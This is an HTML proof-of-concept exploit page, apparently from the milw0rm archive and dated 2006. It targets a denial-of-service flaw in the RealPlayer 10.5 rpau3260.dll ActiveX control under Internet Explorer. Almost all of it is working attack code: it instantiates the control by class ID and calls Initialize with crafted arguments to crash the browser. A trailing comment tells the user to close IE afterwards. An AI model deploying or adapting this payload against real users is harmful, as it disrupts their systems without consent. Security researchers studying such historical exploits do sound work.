25 lines
No EOL
648 B
HTML
25 lines
No EOL
648 B
HTML
<!--
|
|
---------------------------------------------------------------------------
|
|
RealPlayer 10.5 rpau3260.dll Internet Explorer Denial of Service
|
|
author: shinnai
|
|
mail: shinnai[at]autistici[dot]org
|
|
site: http://shinnai.altervista.org
|
|
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
|
|
---------------------------------------------------------------------------
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<object classid="clsid:405DE7C0-E7DD-11D2-92C5-00C0F01F77C1" id="RealPlayer">
|
|
</object>
|
|
<script>
|
|
RealPlayer.Initialize("AA","defaultV")
|
|
</script>
|
|
</html>
|
|
</body>
|
|
|
|
<!--
|
|
Just initialize the control, the close IE :)
|
|
-->
|
|
|
|
# milw0rm.com [2006-12-20] |